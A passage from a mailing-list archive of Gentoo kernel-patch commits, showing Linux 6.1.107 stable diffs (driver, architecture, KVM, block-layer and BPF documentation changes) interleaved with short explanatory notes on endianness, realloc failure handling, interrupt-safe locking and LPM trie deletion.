++	*((__le64 *)(buf + 3 + strlen(TEST_U64_NAME) + 2)) = cpu_to_le64(TEST_U64_DATA);
+ 
+ 	buf = e->start + TEST_NAMED_BLOB_BUF_OFFSET;
+ 	*buf = AA_NAME;
+@@ -104,7 +104,7 @@ static struct aa_ext *build_aa_ext_struct(struct policy_unpack_fixture *puf,
+ 	*(buf + 1) = strlen(TEST_ARRAY_NAME) + 1;
+ 	strcpy(buf + 3, TEST_ARRAY_NAME);
+ 	*(buf + 3 + strlen(TEST_ARRAY_NAME) + 1) = AA_ARRAY;
+-	*((u16 *)(buf + 3 + strlen(TEST_ARRAY_NAME) + 2)) = TEST_ARRAY_SIZE;
++	*((__le16 *)(buf + 3 + strlen(TEST_ARRAY_NAME) + 2)) = cpu_to_le16(TEST_ARRAY_SIZE);
+ 
+ 	return e;
+ }
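
[The three apparmor hunks above are endianness fixes: the unpacker reads these fields as little-endian wire data, so the test must store them through cpu_to_le*() rather than raw host-order writes, or it only passes on little-endian machines. A standalone userspace illustration of the same idea, using glibc's <endian.h> rather than kernel helpers:

    #include <endian.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    int main(void)
    {
        unsigned char buf[4];
        uint32_t le = htole32(0xdeadbeef);   /* byte order fixed, host-independent */

        memcpy(buf, &le, sizeof(le));
        printf("%02x %02x %02x %02x\n", buf[0], buf[1], buf[2], buf[3]);
        /* prints "ef be ad de" on both little- and big-endian hosts */
        return 0;
    }
]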
+diff --git a/sound/soc/amd/acp/acp-legacy-mach.c b/sound/soc/amd/acp/acp-legacy-mach.c
+index 1f4878ff7d372..2f98f3da0ad0b 100644
+--- a/sound/soc/amd/acp/acp-legacy-mach.c
++++ b/sound/soc/amd/acp/acp-legacy-mach.c
+@@ -144,6 +144,8 @@ static const struct platform_device_id board_ids[] = {
+ 	},
+ 	{ }
+ };
++MODULE_DEVICE_TABLE(platform, board_ids);
++
+ static struct platform_driver acp_asoc_audio = {
+ 	.driver = {
+ 		.pm = &snd_soc_pm_ops,
+diff --git a/sound/soc/sof/amd/acp.c b/sound/soc/sof/amd/acp.c
+index f8d2372a758f4..e4e046d4778e2 100644
+--- a/sound/soc/sof/amd/acp.c
++++ b/sound/soc/sof/amd/acp.c
+@@ -363,6 +363,7 @@ static int acp_power_on(struct snd_sof_dev *sdev)
+ 	const struct sof_amd_acp_desc *desc = get_chip_info(sdev->pdata);
+ 	unsigned int base = desc->pgfsm_base;
+ 	unsigned int val;
++	unsigned int acp_pgfsm_status_mask, acp_pgfsm_cntl_mask;
+ 	int ret;
+ 
+ 	val = snd_sof_dsp_read(sdev, ACP_DSP_BAR, base + PGFSM_STATUS_OFFSET);
+@@ -370,9 +371,23 @@ static int acp_power_on(struct snd_sof_dev *sdev)
+ 	if (val == ACP_POWERED_ON)
+ 		return 0;
+ 
+-	if (val & ACP_PGFSM_STATUS_MASK)
++	switch (desc->rev) {
++	case 3:
++	case 5:
++		acp_pgfsm_status_mask = ACP3X_PGFSM_STATUS_MASK;
++		acp_pgfsm_cntl_mask = ACP3X_PGFSM_CNTL_POWER_ON_MASK;
++		break;
++	case 6:
++		acp_pgfsm_status_mask = ACP6X_PGFSM_STATUS_MASK;
++		acp_pgfsm_cntl_mask = ACP6X_PGFSM_CNTL_POWER_ON_MASK;
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	if (val & acp_pgfsm_status_mask)
+ 		snd_sof_dsp_write(sdev, ACP_DSP_BAR, base + PGFSM_CONTROL_OFFSET,
+-				  ACP_PGFSM_CNTL_POWER_ON_MASK);
++				  acp_pgfsm_cntl_mask);
+ 
+ 	ret = snd_sof_dsp_read_poll_timeout(sdev, ACP_DSP_BAR, base + PGFSM_STATUS_OFFSET, val,
+ 					    !val, ACP_REG_POLL_INTERVAL, ACP_REG_POLL_TIMEOUT_US);
+diff --git a/sound/soc/sof/amd/acp.h b/sound/soc/sof/amd/acp.h
+index 14148c311f504..b1414ac1ea985 100644
+--- a/sound/soc/sof/amd/acp.h
++++ b/sound/soc/sof/amd/acp.h
+@@ -22,8 +22,11 @@
+ #define ACP_REG_POLL_TIMEOUT_US                 2000
+ #define ACP_DMA_COMPLETE_TIMEOUT_US		5000
+ 
+-#define ACP_PGFSM_CNTL_POWER_ON_MASK		0x01
+-#define ACP_PGFSM_STATUS_MASK			0x03
++#define ACP3X_PGFSM_CNTL_POWER_ON_MASK		0x01
++#define ACP3X_PGFSM_STATUS_MASK			0x03
++#define ACP6X_PGFSM_CNTL_POWER_ON_MASK		0x07
++#define ACP6X_PGFSM_STATUS_MASK			0x0F
++
+ #define ACP_POWERED_ON				0x00
+ #define ACP_ASSERT_RESET			0x01
+ #define ACP_RELEASE_RESET			0x00
+diff --git a/tools/testing/selftests/net/forwarding/local_termination.sh b/tools/testing/selftests/net/forwarding/local_termination.sh
+index c5b0cbc85b3e0..9b5a63519b949 100755
+--- a/tools/testing/selftests/net/forwarding/local_termination.sh
++++ b/tools/testing/selftests/net/forwarding/local_termination.sh
+@@ -278,6 +278,10 @@ bridge()
+ cleanup()
+ {
+ 	pre_cleanup
++
++	ip link set $h2 down
++	ip link set $h1 down
++
+ 	vrf_cleanup
+ }
+ 
+diff --git a/tools/testing/selftests/net/forwarding/no_forwarding.sh b/tools/testing/selftests/net/forwarding/no_forwarding.sh
+index af3b398d13f01..9e677aa64a06a 100755
+--- a/tools/testing/selftests/net/forwarding/no_forwarding.sh
++++ b/tools/testing/selftests/net/forwarding/no_forwarding.sh
+@@ -233,6 +233,9 @@ cleanup()
+ {
+ 	pre_cleanup
+ 
++	ip link set dev $swp2 down
++	ip link set dev $swp1 down
++
+ 	h2_destroy
+ 	h1_destroy
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread

* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-29 16:49 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-29 16:49 UTC (permalink / raw
  To: gentoo-commits

commit:     33403c8ad79635593cd4b82e8c51d0f33f6f8229
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Aug 29 16:49:33 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Aug 29 16:49:33 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=33403c8a

Linux patch 6.1.107

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |     4 +
 1106_linux-6.1.107.patch | 14310 +++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 14314 insertions(+)

diff --git a/0000_README b/0000_README
index 5002259e..31e8b007 100644
--- a/0000_README
+++ b/0000_README
@@ -471,6 +471,10 @@ Patch:  1105_linux-6.1.106.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.106
 
+Patch:  1106_linux-6.1.107.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.107
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1106_linux-6.1.107.patch b/1106_linux-6.1.107.patch
new file mode 100644
index 00000000..b805e6df
--- /dev/null
+++ b/1106_linux-6.1.107.patch
@@ -0,0 +1,14310 @@
+diff --git a/Documentation/bpf/map_lpm_trie.rst b/Documentation/bpf/map_lpm_trie.rst
+new file mode 100644
+index 0000000000000..b4fce3f7c98ff
+--- /dev/null
++++ b/Documentation/bpf/map_lpm_trie.rst
+@@ -0,0 +1,181 @@
++.. SPDX-License-Identifier: GPL-2.0-only
++.. Copyright (C) 2022 Red Hat, Inc.
++
++=====================
++BPF_MAP_TYPE_LPM_TRIE
++=====================
++
++.. note::
++   - ``BPF_MAP_TYPE_LPM_TRIE`` was introduced in kernel version 4.11
++
++``BPF_MAP_TYPE_LPM_TRIE`` provides a longest prefix match algorithm that
++can be used to match IP addresses to a stored set of prefixes.
++Internally, data is stored in an unbalanced trie of nodes that uses
++``prefixlen,data`` pairs as its keys. The ``data`` is interpreted in
++network byte order, i.e. big endian, so ``data[0]`` stores the most
++significant byte.
++
++LPM tries may be created with a maximum prefix length that is a multiple
++of 8, in the range from 8 to 2048. The key used for lookup and update
++operations is a ``struct bpf_lpm_trie_key_u8``, extended by
++``max_prefixlen/8`` bytes.
++
++- For IPv4 addresses the data length is 4 bytes
++- For IPv6 addresses the data length is 16 bytes
++
++The value type stored in the LPM trie can be any user defined type.
++
++.. note::
++   When creating a map of type ``BPF_MAP_TYPE_LPM_TRIE`` you must set the
++   ``BPF_F_NO_PREALLOC`` flag.
++
++Usage
++=====
++
++Kernel BPF
++----------
++
++.. c:function::
++   void *bpf_map_lookup_elem(struct bpf_map *map, const void *key)
++
++The longest prefix entry for a given data value can be found using the
++``bpf_map_lookup_elem()`` helper. This helper returns a pointer to the
++value associated with the longest matching ``key``, or ``NULL`` if no
++entry was found.
++
++The ``key`` should have ``prefixlen`` set to ``max_prefixlen`` when
++performing longest prefix lookups. For example, when searching for the
++longest prefix match for an IPv4 address, ``prefixlen`` should be set to
++``32``.
++
++.. c:function::
++   long bpf_map_update_elem(struct bpf_map *map, const void *key, const void *value, u64 flags)
++
++Prefix entries can be added or updated using the ``bpf_map_update_elem()``
++helper. This helper replaces existing elements atomically.
++
++``bpf_map_update_elem()`` returns ``0`` on success, or negative error in
++case of failure.
++
++ .. note::
++    The flags parameter must be one of BPF_ANY, BPF_NOEXIST or BPF_EXIST,
++    but the value is ignored, giving BPF_ANY semantics.
++
++.. c:function::
++   long bpf_map_delete_elem(struct bpf_map *map, const void *key)
++
++Prefix entries can be deleted using the ``bpf_map_delete_elem()``
++helper. This helper will return 0 on success, or negative error in case
++of failure.
++
++Userspace
++---------
++
++Access from userspace uses libbpf APIs with the same names as above, with
++the map identified by ``fd``.
++
++.. c:function::
++   int bpf_map_get_next_key (int fd, const void *cur_key, void *next_key)
++
++A userspace program can iterate through the entries in an LPM trie using
++libbpf's ``bpf_map_get_next_key()`` function. The first key can be
++fetched by calling ``bpf_map_get_next_key()`` with ``cur_key`` set to
++``NULL``. Subsequent calls will fetch the next key that follows the
++current key. ``bpf_map_get_next_key()`` returns ``0`` on success,
++``-ENOENT`` if ``cur_key`` is the last key in the trie, or negative
++error in case of failure.
++
++``bpf_map_get_next_key()`` will iterate through the LPM trie elements
++from leftmost leaf first. This means that iteration will return more
++specific keys before less specific ones.
++
++Examples
++========
++
++Please see ``tools/testing/selftests/bpf/test_lpm_map.c`` for examples
++of LPM trie usage from userspace. The code snippets below demonstrate
++API usage.
++
++Kernel BPF
++----------
++
++The following BPF code snippet shows how to declare a new LPM trie for IPv4
++address prefixes:
++
++.. code-block:: c
++
++    #include <linux/bpf.h>
++    #include <bpf/bpf_helpers.h>
++
++    struct ipv4_lpm_key {
++            __u32 prefixlen;
++            __u32 data;
++    };
++
++    struct {
++            __uint(type, BPF_MAP_TYPE_LPM_TRIE);
++            __type(key, struct ipv4_lpm_key);
++            __type(value, __u32);
++            __uint(map_flags, BPF_F_NO_PREALLOC);
++            __uint(max_entries, 255);
++    } ipv4_lpm_map SEC(".maps");
++
++The following BPF code snippet shows how to lookup by IPv4 address:
++
++.. code-block:: c
++
++    void *lookup(__u32 ipaddr)
++    {
++            struct ipv4_lpm_key key = {
++                    .prefixlen = 32,
++                    .data = ipaddr
++            };
++
++            return bpf_map_lookup_elem(&ipv4_lpm_map, &key);
++    }
++
++Userspace
++---------
++
++The following snippet shows how to insert an IPv4 prefix entry into an
++LPM trie:
++
++.. code-block:: c
++
++    int add_prefix_entry(int lpm_fd, __u32 addr, __u32 prefixlen, struct value *value)
++    {
++            struct ipv4_lpm_key ipv4_key = {
++                    .prefixlen = prefixlen,
++                    .data = addr
++            };
++            return bpf_map_update_elem(lpm_fd, &ipv4_key, value, BPF_ANY);
++    }
++
++The following snippet shows a userspace program walking through the entries
++of an LPM trie:
++
++
++.. code-block:: c
++
++    #include <bpf/libbpf.h>
++    #include <bpf/bpf.h>
++
++    void iterate_lpm_trie(int map_fd)
++    {
++            struct ipv4_lpm_key *cur_key = NULL;
++            struct ipv4_lpm_key next_key;
++            struct value value;
++            int err;
++
++            for (;;) {
++                    err = bpf_map_get_next_key(map_fd, cur_key, &next_key);
++                    if (err)
++                            break;
++
++                    bpf_map_lookup_elem(map_fd, &next_key, &value);
++
++                    /* Use key and value here */
++
++                    cur_key = &next_key;
++            }
++    }
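
[One operation the new document describes but never demonstrates from userspace is deletion. A sketch reusing the hypothetical ipv4_lpm_key from the snippets above, with libbpf's bpf_map_delete_elem():

    #include <bpf/bpf.h>

    int remove_prefix_entry(int lpm_fd, __u32 addr, __u32 prefixlen)
    {
            struct ipv4_lpm_key key = {
                    .prefixlen = prefixlen,
                    .data = addr
            };

            /* 0 on success, negative error (e.g. -ENOENT) on failure */
            return bpf_map_delete_elem(lpm_fd, &key);
    }
]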
+diff --git a/Documentation/filesystems/gfs2-glocks.rst b/Documentation/filesystems/gfs2-glocks.rst
+index d14f230f0b123..93a690b9bcf2d 100644
+--- a/Documentation/filesystems/gfs2-glocks.rst
++++ b/Documentation/filesystems/gfs2-glocks.rst
+@@ -20,8 +20,7 @@ The gl_holders list contains all the queued lock requests (not
+ just the holders) associated with the glock. If there are any
+ held locks, then they will be contiguous entries at the head
+ of the list. Locks are granted in strictly the order that they
+-are queued, except for those marked LM_FLAG_PRIORITY which are
+-used only during recovery, and even then only for journal locks.
++are queued.
+ 
+ There are three lock states that users of the glock layer can request,
+ namely shared (SH), deferred (DF) and exclusive (EX). Those translate
+diff --git a/Makefile b/Makefile
+index f0fd656e9da3c..4c0fc0e5e002f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 106
++SUBLEVEL = 107
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/kernel/acpi_numa.c b/arch/arm64/kernel/acpi_numa.c
+index e51535a5f939a..ccbff21ce1faf 100644
+--- a/arch/arm64/kernel/acpi_numa.c
++++ b/arch/arm64/kernel/acpi_numa.c
+@@ -27,7 +27,7 @@
+ 
+ #include <asm/numa.h>
+ 
+-static int acpi_early_node_map[NR_CPUS] __initdata = { NUMA_NO_NODE };
++static int acpi_early_node_map[NR_CPUS] __initdata = { [0 ... NR_CPUS - 1] = NUMA_NO_NODE };
+ 
+ int __init acpi_numa_get_nid(unsigned int cpu)
+ {
+diff --git a/arch/arm64/kernel/setup.c b/arch/arm64/kernel/setup.c
+index fea3223704b63..44c4d79bd914c 100644
+--- a/arch/arm64/kernel/setup.c
++++ b/arch/arm64/kernel/setup.c
+@@ -360,9 +360,6 @@ void __init __no_sanitize_address setup_arch(char **cmdline_p)
+ 	smp_init_cpus();
+ 	smp_build_mpidr_hash();
+ 
+-	/* Init percpu seeds for random tags after cpus are set up. */
+-	kasan_init_sw_tags();
+-
+ #ifdef CONFIG_ARM64_SW_TTBR0_PAN
+ 	/*
+ 	 * Make sure init_thread_info.ttbr0 always generates translation
+diff --git a/arch/arm64/kernel/smp.c b/arch/arm64/kernel/smp.c
+index d323621d14a59..b606093a5596c 100644
+--- a/arch/arm64/kernel/smp.c
++++ b/arch/arm64/kernel/smp.c
+@@ -464,6 +464,8 @@ void __init smp_prepare_boot_cpu(void)
+ 		init_gic_priority_masking();
+ 
+ 	kasan_init_hw_tags();
++	/* Init percpu seeds for random tags after cpus are set up. */
++	kasan_init_sw_tags();
+ }
+ 
+ /*
+diff --git a/arch/arm64/kvm/sys_regs.c b/arch/arm64/kvm/sys_regs.c
+index 457e74f1f6717..974b94ad79523 100644
+--- a/arch/arm64/kvm/sys_regs.c
++++ b/arch/arm64/kvm/sys_regs.c
+@@ -30,6 +30,7 @@
+ #include <trace/events/kvm.h>
+ 
+ #include "sys_regs.h"
++#include "vgic/vgic.h"
+ 
+ #include "trace.h"
+ 
+@@ -200,6 +201,11 @@ static bool access_gic_sgi(struct kvm_vcpu *vcpu,
+ {
+ 	bool g1;
+ 
++	if (!kvm_has_gicv3(vcpu->kvm)) {
++		kvm_inject_undefined(vcpu);
++		return false;
++	}
++
+ 	if (!p->is_write)
+ 		return read_from_write_only(vcpu, p, r);
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic.h b/arch/arm64/kvm/vgic/vgic.h
+index 5fb0bfc07d856..bc898229167bc 100644
+--- a/arch/arm64/kvm/vgic/vgic.h
++++ b/arch/arm64/kvm/vgic/vgic.h
+@@ -334,4 +334,11 @@ void vgic_v4_configure_vsgis(struct kvm *kvm);
+ void vgic_v4_get_vlpi_state(struct vgic_irq *irq, bool *val);
+ int vgic_v4_request_vpe_irq(struct kvm_vcpu *vcpu, int irq);
+ 
++static inline bool kvm_has_gicv3(struct kvm *kvm)
++{
++	return (static_branch_unlikely(&kvm_vgic_global_state.gicv3_cpuif) &&
++		irqchip_in_kernel(kvm) &&
++		kvm->arch.vgic.vgic_model == KVM_DEV_TYPE_ARM_VGIC_V3);
++}
++
+ #endif
+diff --git a/arch/mips/kernel/cpu-probe.c b/arch/mips/kernel/cpu-probe.c
+index 482af80b81790..fdf00c228b67f 100644
+--- a/arch/mips/kernel/cpu-probe.c
++++ b/arch/mips/kernel/cpu-probe.c
+@@ -1723,12 +1723,16 @@ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu)
+ 		c->ases |= (MIPS_ASE_LOONGSON_MMI | MIPS_ASE_LOONGSON_CAM |
+ 			MIPS_ASE_LOONGSON_EXT | MIPS_ASE_LOONGSON_EXT2);
+ 		c->ases &= ~MIPS_ASE_VZ; /* VZ of Loongson-3A2000/3000 is incomplete */
++		change_c0_config6(LOONGSON_CONF6_EXTIMER | LOONGSON_CONF6_INTIMER,
++				  LOONGSON_CONF6_INTIMER);
+ 		break;
+ 	case PRID_IMP_LOONGSON_64G:
+ 		__cpu_name[cpu] = "ICT Loongson-3";
+ 		set_elf_platform(cpu, "loongson3a");
+ 		set_isa(c, MIPS_CPU_ISA_M64R2);
+ 		decode_cpucfg(c);
++		change_c0_config6(LOONGSON_CONF6_EXTIMER | LOONGSON_CONF6_INTIMER,
++				  LOONGSON_CONF6_INTIMER);
+ 		break;
+ 	default:
+ 		panic("Unknown Loongson Processor ID!");
+diff --git a/arch/openrisc/kernel/setup.c b/arch/openrisc/kernel/setup.c
+index 0cd04d936a7a1..f2fe45d3094df 100644
+--- a/arch/openrisc/kernel/setup.c
++++ b/arch/openrisc/kernel/setup.c
+@@ -270,6 +270,9 @@ void calibrate_delay(void)
+ 
+ void __init setup_arch(char **cmdline_p)
+ {
++	/* setup memblock allocator */
++	setup_memory();
++
+ 	unflatten_and_copy_device_tree();
+ 
+ 	setup_cpuinfo();
+@@ -293,9 +296,6 @@ void __init setup_arch(char **cmdline_p)
+ 	}
+ #endif
+ 
+-	/* setup memblock allocator */
+-	setup_memory();
+-
+ 	/* paging_init() sets up the MMU and marks all pages as reserved */
+ 	paging_init();
+ 
+diff --git a/arch/parisc/kernel/irq.c b/arch/parisc/kernel/irq.c
+index 9ddb2e3970589..b481cde6bfb62 100644
+--- a/arch/parisc/kernel/irq.c
++++ b/arch/parisc/kernel/irq.c
+@@ -501,7 +501,7 @@ void do_cpu_irq_mask(struct pt_regs *regs)
+ 
+ 	old_regs = set_irq_regs(regs);
+ 	local_irq_disable();
+-	irq_enter();
++	irq_enter_rcu();
+ 
+ 	eirr_val = mfctl(23) & cpu_eiem & per_cpu(local_ack_eiem, cpu);
+ 	if (!eirr_val)
+@@ -536,7 +536,7 @@ void do_cpu_irq_mask(struct pt_regs *regs)
+ #endif /* CONFIG_IRQSTACKS */
+ 
+  out:
+-	irq_exit();
++	irq_exit_rcu();
+ 	set_irq_regs(old_regs);
+ 	return;
+ 
+diff --git a/arch/powerpc/boot/simple_alloc.c b/arch/powerpc/boot/simple_alloc.c
+index 267d6524caac4..d07796fdf91aa 100644
+--- a/arch/powerpc/boot/simple_alloc.c
++++ b/arch/powerpc/boot/simple_alloc.c
+@@ -112,8 +112,11 @@ static void *simple_realloc(void *ptr, unsigned long size)
+ 		return ptr;
+ 
+ 	new = simple_malloc(size);
+-	memcpy(new, ptr, p->size);
+-	simple_free(ptr);
++	if (new) {
++		memcpy(new, ptr, p->size);
++		simple_free(ptr);
++	}
++
+ 	return new;
+ }
+ 
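[The bootwrapper fix above adds the missing allocation-failure check, matching the contract of C's realloc: on failure, return NULL and leave the original block untouched. A freestanding userspace sketch of the same rule (standard C, not the bootwrapper's allocator, which tracks sizes itself):

    #include <stdlib.h>
    #include <string.h>

    void *xrealloc(void *ptr, size_t old_size, size_t new_size)
    {
        void *new = malloc(new_size);

        if (new) {      /* only copy and free once the allocation succeeded */
            memcpy(new, ptr, old_size < new_size ? old_size : new_size);
            free(ptr);
        }
        return new;     /* NULL: the caller still owns the original block */
    }
]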
+diff --git a/arch/powerpc/sysdev/xics/icp-native.c b/arch/powerpc/sysdev/xics/icp-native.c
+index edc17b6b1cc2f..9b2238d73003b 100644
+--- a/arch/powerpc/sysdev/xics/icp-native.c
++++ b/arch/powerpc/sysdev/xics/icp-native.c
+@@ -236,6 +236,8 @@ static int __init icp_native_map_one_cpu(int hw_id, unsigned long addr,
+ 	rname = kasprintf(GFP_KERNEL, "CPU %d [0x%x] Interrupt Presentation",
+ 			  cpu, hw_id);
+ 
++	if (!rname)
++		return -ENOMEM;
+ 	if (!request_mem_region(addr, size, rname)) {
+ 		pr_warn("icp_native: Could not reserve ICP MMIO for CPU %d, interrupt server #0x%x\n",
+ 			cpu, hw_id);
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 7ba5c244f3a07..ba2210b553f9c 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -816,7 +816,7 @@ static void __init create_kernel_page_table(pgd_t *pgdir,
+ 				   PMD_SIZE, PAGE_KERNEL_EXEC);
+ 
+ 	/* Map the data in RAM */
+-	end_va = kernel_map.virt_addr + XIP_OFFSET + kernel_map.size;
++	end_va = kernel_map.virt_addr + kernel_map.size;
+ 	for (va = kernel_map.virt_addr + XIP_OFFSET; va < end_va; va += PMD_SIZE)
+ 		create_pgd_mapping(pgdir, va,
+ 				   kernel_map.phys_addr + (va - (kernel_map.virt_addr + XIP_OFFSET)),
+@@ -947,7 +947,7 @@ asmlinkage void __init setup_vm(uintptr_t dtb_pa)
+ 
+ 	phys_ram_base = CONFIG_PHYS_RAM_BASE;
+ 	kernel_map.phys_addr = (uintptr_t)CONFIG_PHYS_RAM_BASE;
+-	kernel_map.size = (uintptr_t)(&_end) - (uintptr_t)(&_sdata);
++	kernel_map.size = (uintptr_t)(&_end) - (uintptr_t)(&_start);
+ 
+ 	kernel_map.va_kernel_xip_pa_offset = kernel_map.virt_addr - kernel_map.xiprom;
+ #else
+diff --git a/arch/s390/include/asm/uv.h b/arch/s390/include/asm/uv.h
+index be3ef9dd69726..6abcb46a8dfe2 100644
+--- a/arch/s390/include/asm/uv.h
++++ b/arch/s390/include/asm/uv.h
+@@ -387,7 +387,10 @@ static inline int share(unsigned long addr, u16 cmd)
+ 
+ 	if (!uv_call(0, (u64)&uvcb))
+ 		return 0;
+-	return -EINVAL;
++	pr_err("%s UVC failed (rc: 0x%x, rrc: 0x%x), possible hypervisor bug.\n",
++	       uvcb.header.cmd == UVC_CMD_SET_SHARED_ACCESS ? "Share" : "Unshare",
++	       uvcb.header.rc, uvcb.header.rrc);
++	panic("System security cannot be guaranteed unless the system panics now.\n");
+ }
+ 
+ /*
+diff --git a/arch/s390/kernel/early.c b/arch/s390/kernel/early.c
+index 9693c8630e73f..b3cb256ec6692 100644
+--- a/arch/s390/kernel/early.c
++++ b/arch/s390/kernel/early.c
+@@ -237,15 +237,9 @@ static inline void save_vector_registers(void)
+ #endif
+ }
+ 
+-static inline void setup_control_registers(void)
++static inline void setup_low_address_protection(void)
+ {
+-	unsigned long reg;
+-
+-	__ctl_store(reg, 0, 0);
+-	reg |= CR0_LOW_ADDRESS_PROTECTION;
+-	reg |= CR0_EMERGENCY_SIGNAL_SUBMASK;
+-	reg |= CR0_EXTERNAL_CALL_SUBMASK;
+-	__ctl_load(reg, 0, 0);
++	__ctl_set_bit(0, 28);
+ }
+ 
+ static inline void setup_access_registers(void)
+@@ -304,7 +298,7 @@ void __init startup_init(void)
+ 	save_vector_registers();
+ 	setup_topology();
+ 	sclp_early_detect();
+-	setup_control_registers();
++	setup_low_address_protection();
+ 	setup_access_registers();
+ 	lockdep_on();
+ }
+diff --git a/arch/s390/kernel/smp.c b/arch/s390/kernel/smp.c
+index 0031325ce4bc9..436dbf4d743d8 100644
+--- a/arch/s390/kernel/smp.c
++++ b/arch/s390/kernel/smp.c
+@@ -1007,12 +1007,12 @@ void __init smp_fill_possible_mask(void)
+ 
+ void __init smp_prepare_cpus(unsigned int max_cpus)
+ {
+-	/* request the 0x1201 emergency signal external interrupt */
+ 	if (register_external_irq(EXT_IRQ_EMERGENCY_SIG, do_ext_call_interrupt))
+ 		panic("Couldn't request external interrupt 0x1201");
+-	/* request the 0x1202 external call external interrupt */
++	ctl_set_bit(0, 14);
+ 	if (register_external_irq(EXT_IRQ_EXTERNAL_CALL, do_ext_call_interrupt))
+ 		panic("Couldn't request external interrupt 0x1202");
++	ctl_set_bit(0, 13);
+ }
+ 
+ void __init smp_prepare_boot_cpu(void)
+diff --git a/arch/x86/kernel/process.c b/arch/x86/kernel/process.c
+index 279b5e9be80fc..acc83738bf5b4 100644
+--- a/arch/x86/kernel/process.c
++++ b/arch/x86/kernel/process.c
+@@ -991,7 +991,10 @@ unsigned long arch_align_stack(unsigned long sp)
+ 
+ unsigned long arch_randomize_brk(struct mm_struct *mm)
+ {
+-	return randomize_page(mm->brk, 0x02000000);
++	if (mmap_is_ia32())
++		return randomize_page(mm->brk, SZ_32M);
++
++	return randomize_page(mm->brk, SZ_1G);
+ }
+ 
+ /*
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index c90fef0258c51..3cd590ace95a3 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -1843,8 +1843,12 @@ static bool set_target_expiration(struct kvm_lapic *apic, u32 count_reg)
+ 		if (unlikely(count_reg != APIC_TMICT)) {
+ 			deadline = tmict_to_ns(apic,
+ 				     kvm_lapic_get_reg(apic, count_reg));
+-			if (unlikely(deadline <= 0))
+-				deadline = apic->lapic_timer.period;
++			if (unlikely(deadline <= 0)) {
++				if (apic_lvtt_period(apic))
++					deadline = apic->lapic_timer.period;
++				else
++					deadline = 0;
++			}
+ 			else if (unlikely(deadline > apic->lapic_timer.period)) {
+ 				pr_info_ratelimited(
+ 				    "kvm: vcpu %i: requested lapic timer restore with "
+diff --git a/block/blk-mq-tag.c b/block/blk-mq-tag.c
+index 100889c276c3f..dcd620422d01d 100644
+--- a/block/blk-mq-tag.c
++++ b/block/blk-mq-tag.c
+@@ -40,6 +40,7 @@ static void blk_mq_update_wake_batch(struct blk_mq_tags *tags,
+ void __blk_mq_tag_busy(struct blk_mq_hw_ctx *hctx)
+ {
+ 	unsigned int users;
++	unsigned long flags;
+ 	struct blk_mq_tags *tags = hctx->tags;
+ 
+ 	/*
+@@ -58,11 +59,11 @@ void __blk_mq_tag_busy(struct blk_mq_hw_ctx *hctx)
+ 			return;
+ 	}
+ 
+-	spin_lock_irq(&tags->lock);
++	spin_lock_irqsave(&tags->lock, flags);
+ 	users = tags->active_queues + 1;
+ 	WRITE_ONCE(tags->active_queues, users);
+ 	blk_mq_update_wake_batch(tags, users);
+-	spin_unlock_irq(&tags->lock);
++	spin_unlock_irqrestore(&tags->lock, flags);
+ }
+ 
+ /*
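
[The blk-mq change swaps spin_lock_irq() for spin_lock_irqsave(): the _irq variant unconditionally re-enables interrupts on unlock, so it is only correct when the caller is known to run with interrupts enabled, while _irqsave restores whatever state the caller had. The safer form in a generic sketch (my_tags is a placeholder type):

    static void bump_active(struct my_tags *tags)
    {
        unsigned long flags;

        spin_lock_irqsave(&tags->lock, flags);   /* safe from any context */
        tags->active_queues++;
        spin_unlock_irqrestore(&tags->lock, flags);
    }
]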
+diff --git a/drivers/atm/idt77252.c b/drivers/atm/idt77252.c
+index 2daf50d4cd47a..7810f974b2ca9 100644
+--- a/drivers/atm/idt77252.c
++++ b/drivers/atm/idt77252.c
+@@ -1118,8 +1118,8 @@ dequeue_rx(struct idt77252_dev *card, struct rsq_entry *rsqe)
+ 	rpp->len += skb->len;
+ 
+ 	if (stat & SAR_RSQE_EPDU) {
++		unsigned int len, truesize;
+ 		unsigned char *l1l2;
+-		unsigned int len;
+ 
+ 		l1l2 = (unsigned char *) ((unsigned long) skb->data + skb->len - 6);
+ 
+@@ -1189,14 +1189,15 @@ dequeue_rx(struct idt77252_dev *card, struct rsq_entry *rsqe)
+ 		ATM_SKB(skb)->vcc = vcc;
+ 		__net_timestamp(skb);
+ 
++		truesize = skb->truesize;
+ 		vcc->push(vcc, skb);
+ 		atomic_inc(&vcc->stats->rx);
+ 
+-		if (skb->truesize > SAR_FB_SIZE_3)
++		if (truesize > SAR_FB_SIZE_3)
+ 			add_rx_skb(card, 3, SAR_FB_SIZE_3, 1);
+-		else if (skb->truesize > SAR_FB_SIZE_2)
++		else if (truesize > SAR_FB_SIZE_2)
+ 			add_rx_skb(card, 2, SAR_FB_SIZE_2, 1);
+-		else if (skb->truesize > SAR_FB_SIZE_1)
++		else if (truesize > SAR_FB_SIZE_1)
+ 			add_rx_skb(card, 1, SAR_FB_SIZE_1, 1);
+ 		else
